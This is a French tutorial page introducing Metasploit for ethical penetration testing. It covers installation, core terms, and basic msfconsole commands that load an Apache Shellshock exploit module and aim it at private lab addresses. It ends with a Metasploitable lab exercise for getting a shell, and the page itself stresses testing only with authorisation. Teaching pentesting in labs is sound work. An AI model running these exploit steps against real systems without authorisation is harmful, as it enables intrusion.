ITSkillsCenter
Cybersécurité

Tutoriel : Introduction à Metasploit pour le pentesting éthique

2 min de lecture

Metasploit : l’outil de pentesting le plus utilisé au monde

Metasploit Framework est un outil open source de test d’intrusion qui permet de simuler des attaques pour identifier les vulnérabilités de vos systèmes. C’est l’outil de référence pour les professionnels de la cybersécurité.

Avertissement légal

N’utilisez Metasploit que sur des systèmes que vous êtes autorisé à tester. Le pentesting sans autorisation est un délit pénal. Utilisez un lab personnel ou des plateformes comme HackTheBox et TryHackMe.

Installation

Sur Kali Linux (pré-installé)

msfconsole

# Metasploit est déjà installé sur Kali Linux

Sur Ubuntu/Debian

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall

chmod 755 msfinstall

./msfinstall

Les concepts fondamentaux

Terme Définition Exemple
Exploit Code qui exploite une vulnérabilité EternalBlue (MS17-010)
Payload Code exécuté après l’exploitation Meterpreter (shell avancé)
Module Composant de Metasploit auxiliary, exploit, post
Listener Attend la connexion retour multi/handler
Session Connexion active avec la cible Meterpreter session

Commandes de base msfconsole

# Chercher un exploit

search type:exploit name:apache

# Sélectionner un module

use exploit/multi/http/apache_mod_cgi_bash_env_exec

# Voir les options requises

show options

# Configurer la cible

set RHOSTS 192.168.1.100

set LHOST 192.168.1.50

# Lancer l’exploit

exploit

Workflow type d’un pentest

  1. Reconnaissance : Nmap pour scanner les ports et services
  2. Recherche : searchsploit ou search dans msfconsole
  3. Configuration : définir RHOSTS, LHOST, payload
  4. Exploitation : lancer l’exploit
  5. Post-exploitation : escalade de privilèges, pivot
  6. Rapport : documenter les vulnérabilités trouvées

Lab d’entraînement recommandés

  • Metasploitable 2/3 : VM vulnérable conçue pour s’entraîner
  • DVWA : Damn Vulnerable Web App
  • TryHackMe : parcours guidés gratuits
  • HackTheBox : challenges plus avancés
  • VulnHub : VMs téléchargeables

Exercice pratique

Premier pentest en lab

  1. Installez VirtualBox et Kali Linux
  2. Téléchargez et importez Metasploitable 2
  3. Scannez Metasploitable avec Nmap
  4. Identifiez un service vulnérable (ex : vsftpd 2.3.4)
  5. Trouvez l’exploit dans Metasploit
  6. Exploitez et obtenez un shell
  7. Documentez la vulnérabilité et la correction
#exploitation #metasploit #pentesting
Besoin d'un site web ?

Confiez-nous la Création de Votre Site Web

Site vitrine, e-commerce ou application web — nous transformons votre vision en réalité digitale. Accompagnement personnalisé de A à Z.

À partir de 350.000 FCFA
Parlons de Votre Projet
Publicité

Articles Similaires